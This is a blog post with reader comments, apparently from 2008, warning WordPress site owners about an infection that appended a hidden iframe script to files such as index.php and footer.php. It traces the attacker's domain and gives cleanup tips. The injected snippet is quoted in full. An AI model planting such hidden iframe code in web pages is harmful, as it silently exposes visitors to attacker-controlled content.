Check your website for virus attack !

Just discovered this by accident. My server files have been infected with a piece of javascript code that sends the information to a certain site. This is certainly a first.

How can you check this?

The virus attacks following files on your server:

  • index.php
  • index.html
  • main.php
  • header.php
  • footer.php

At the end of these files it will insert the following code:

<script language=javascript>status=location;document.write ('<iframe src="hххp://" width=0
height=0 frameborder=0 display:none onLoad="status=defaultStatus;"></iframe>');</script>

Update: if you use WordPress read how to check WordPress sites.

What it does?

I can only guess. The code is calling a script on site. It can be sending traffic information. Maybe it is a first case of Internet marketing espionage? Or it can be trying to run some malicious code.

How did it come here?

It can be a security flaw on my hosting server. It can be a security flaw of the WordPress which is the main script I run on my server.

Whatever way it came, it executed code that scanned through all the files on my server that match the given names and added that code at the end.

All created files carry the time stamp 29-06-2008 04:59 which is the time when the attack occurred.

How did I discover it?

By accident. I was looking at the HTTP requests on my site using Firebug. I noticed few 404 Object not found errors. Normally I keep my blog in good shape and these things should not happen.

I then suspected that some of the plugins I use reference this site. After inspection I could find the script inserted to a number of plugins.

I have then checked my theme - it was there too in the index, header and footer. I then checked the whole WordPress installation - the script was there.

Finally I discovered it was spread out on my whole server.

The lucky thing is the attacker's site broke down so I could find an anomaly with that 404 error.

Who is behind it?

I am still not sure. Here is the domain registration record for

Domain ID:D23976304-LRMS
Created On:29-Feb-2008 23:08:51 UTC
Last Updated On:22-Jun-2008 11:24:52 UTC
Expiration Date:28-Feb-2009 23:08:51 UTC
Sponsoring Digital Communications Inc. (R315-LRMS)
Registrant ID:PP-SP-001
Registrant Name:Domain Admin
Registrant Street1:P.O. Box 97
Registrant Street2:Note - All Postal Mails Rejected, visit
Registrant Street3:
Registrant City:Moergestel
Registrant State/Province:
Registrant Postal Code:5066 ZH
Registrant Country:NL
Registrant Phone:+45.36946676

The site is registered somewhere in Denmark under an anonymous name. is mentioned as Sponsoring Registrar.

The server IP is and is located in Ukraine.

Trace route finishes before getting to the site:

11    86 ms    83 ms    83 ms []
12   114 ms   107 ms   107 ms []
13   691 ms   611 ms   131 ms []

14     *        *        *     Request timed out.

What can I do?

You should check the files on your server for the code. Check index.php and index.html first as they are most likely to have been infected.

Warn your friends about it.

Posted in: WordPress
TAGS:, , , , , , , , , , , , , , ,
Both comments and trackbacks are currently closed.


  1. Aug 29th, 2012 7:34 AM

    will vladimir thanks for the information and i will say more that mostly the add it in to header and footer cos it will be sure include in all pages and custom pages i think best way for non webmasters to check them websites by antivirus websites and there is tons of them

  2. Jun 18th, 2012 9:09 AM

    i remove the javascript virus code before some days but it come again and again what is the solution of it

  3. May 5th, 2012 2:04 PM

    Anyone plz help me and save my website and tell me how to save/clean...... Plz

  4. Jan 22nd, 2012 5:02 PM

    i think first of all you have to check your website in local by a classical antivirus

  5. Jan 12th, 2011 8:32 PM

    The site is not located at Denmark but at Holland. Look it up in google, and notice NL under it?

  6. Oct 10th, 2010 5:57 AM

    i have faced this problem i don't know what they get from creating problems to others..

  7. Oct 4th, 2010 2:17 AM

    The firebug tip helped a lot. For one of the sites I worked on - the malware script was appended at the end of a Calender plugin.


  8. mikeyb-ibc
    Jun 20th, 2010 9:03 PM

    You can check all your files quite simply by downloading a back up of your site and scanning it with your anti virus programme ;)

  9. Apr 29th, 2010 8:02 PM

    My website was infected too. Thanks to your post it seems to be clean now. Too bad I must have lost many many visitors :( I still don't know where did it come from. Your article is really helpful. It's definitely worth bookmarking and it helped me to solve my problem.

    I would also like to add that my piece of javascript code was encrypted so it looked differently but loaded similar thing (from different domain though).

  10. Mar 27th, 2010 6:38 AM

    Virus attackers got smarter! My website was attacked in similar way, but they encrypted their script, so if you search by "http://", you won't find any suspicious website. Try to look for javascript code that is not formatted, and once found it, try to see if you can find the same scripts in all files on your site. For details, check my blog

  11. Feb 26th, 2010 1:39 AM

    Thanks a lot. Finally i've found an article that really helps me with viruses' problem. My WordPress engine working bad last time and i can't even imagine where i'll find a problem but now it's ok and i'm glad to find such informative articles and thanks to kind people who helps us.

  12. Feb 23rd, 2010 5:23 PM

    Thanks Vladimir! It's great and helpful information for all website owners.

  13. Jan 11th, 2010 11:32 AM

    Help me to check my website virus ?

    • Jan 16th, 2010 1:54 AM

      You can ask your host company, they can run a scan on your files.

      Otherwise you can download your website, and run a scan on it to check for viruses. It should be able to remove the virus and then you can upload the clean file(s) again.

      However, if there is really a virus on your server, then only the host company can help you, the should also install a firewall.

  14. cs
    Jan 6th, 2010 8:05 AM

    One of my friend's site is infected by GNU GPL virus. which has added js at the end of page.

    is there any online scanner? is there any alert system which will give email whenever site is infected?

    share & shine.